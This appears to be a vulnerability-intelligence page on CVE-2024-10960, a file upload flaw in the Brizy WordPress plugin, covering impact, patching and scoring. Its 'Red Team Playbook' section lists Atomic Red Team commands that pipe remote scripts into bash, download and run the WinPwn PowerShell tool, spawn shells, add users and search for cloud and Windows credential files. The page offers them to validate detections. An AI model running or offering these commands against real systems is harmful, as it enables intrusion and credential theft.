CVE-2024-10960
Overview
This vulnerability is an arbitrary file upload flaw caused by the absence of proper file type validation in the 'storeUploads' function of the Brizy – Page Builder WordPress plugin. The affected component is the file upload handler within the plugin, which fails to restrict the types of files that authenticated users can upload. This lack of validation enables the acceptance of potentially malicious files without verification of their content or extension.
Vulnerability Description
The Brizy – Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'storeUploads' function in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
Impact
An attacker with Contributor-level or greater access can leverage this vulnerability to upload arbitrary files, including malicious scripts, to the web server. This capability can lead to remote code execution, enabling full compromise of the affected WordPress site. The attack requires authenticated access but no user interaction beyond login. The CVSS vector indicates network attack vector (AV:N), low attack complexity (AC:L), and privileges required (PR:L), confirming that authenticated users can exploit this without additional conditions.
Solution
Users should upgrade the Brizy – Page Builder plugin to version 2.6.5 or later, where the vulnerability is patched by adding file type validation in the 'storeUploads' function. Detailed patch information and remediation steps are available in the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/2f0c85f4-07ae-4a2b-bd82-93467e7d9325 and the plugin's changeset 3222672 on the WordPress plugin repository. No alternative workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Brizy Page Builder plugin for WordPress stems from inadequate file type validation within the 'storeUploads' function. This flaw allows authenticated users, specifically those with Contributor-level access or higher, to upload arbitrary files to the server hosting the affected website. The absence of stringent checks on the file types being uploaded means that an attacker could potentially upload malicious scripts or executables disguised as benign files. This lack of validation creates a significant security gap, as it opens the door for remote code execution, enabling attackers to execute commands on the server and gain unauthorized access to sensitive data or further compromise the site.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated attacker could leverage their access to upload a malicious file, such as a web shell or a PHP script, which would then be executed on the server. Once the attacker has successfully uploaded a malicious file, they can manipulate the server environment, potentially leading to data breaches, website defacement, or even the establishment of persistent backdoors for future access. The risk is exacerbated by the fact that many WordPress installations may have multiple users with varying levels of access, increasing the likelihood that an attacker could find a suitable target to exploit.
The real-world impact of this vulnerability can be severe, especially for businesses that rely on their online presence for revenue generation and customer engagement. Successful exploitation could lead to significant downtime, loss of customer trust, and potential legal ramifications if sensitive customer data is compromised. Furthermore, the presence of malicious code on a server can lead to the site being blacklisted by search engines or security services, resulting in a loss of visibility and traffic. The financial implications can be substantial, not only due to immediate recovery costs but also due to long-term damage to brand reputation and customer relationships.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the Brizy Page Builder plugin to the latest version is crucial, as developers often release patches to address known vulnerabilities. Additionally, organizations should enforce strict access controls, ensuring that only trusted users have Contributor-level access or higher. Employing web application firewalls (WAFs) can help filter out malicious requests and prevent unauthorized file uploads. Regular security audits and penetration testing can also aid in identifying and remediating vulnerabilities before they can be exploited by malicious actors.
In conclusion, the vulnerability within the Brizy Page Builder plugin highlights the critical importance of robust file validation mechanisms in web applications. The potential for arbitrary file uploads poses a significant threat to the integrity and security of affected WordPress sites. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Proactive detection and mitigation strategies are essential to safeguard against exploitation and to maintain the trust of users and stakeholders alike.
Recent updates to the CVE-2024-10960 vulnerability assessment reflect an upward revision of the CVSS score from 8.8 to 9.9, indicating a reassessment of the exploit’s potential impact and ease of exploitation. Concurrently, the Exploit Prediction Scoring System (EPSS) score has increased modestly, suggesting a slight but meaningful rise in the likelihood of exploitation attempts as measured by CSURFACE threat intelligence. Although no new exploit code or active campaigns have been detected by our telemetry, the elevated scores underscore growing concern within the security community regarding the vulnerability’s critical nature. This change matters because it signals that attackers may find this flaw increasingly attractive or feasible to leverage, particularly given the low privilege required for exploitation and the severe consequences of remote code execution on affected WordPress sites. For defenders, the heightened risk level demands increased vigilance in monitoring and patching affected environments, as the window for opportunistic exploitation may be narrowing. The updated risk assessment now places CVE-2024-10960 at the highest severity tier, reinforcing its status as a critical threat that warrants immediate attention despite the absence of confirmed active exploitation.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Brizy | Brizy | All |
cpe:2.3:a:brizy:brizy:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10960 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/2f0c85f4-07ae-4a2b-bd82-93467e7d9325?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3222672/brizy/tags/2.6.5/editor/zip/archiver.php |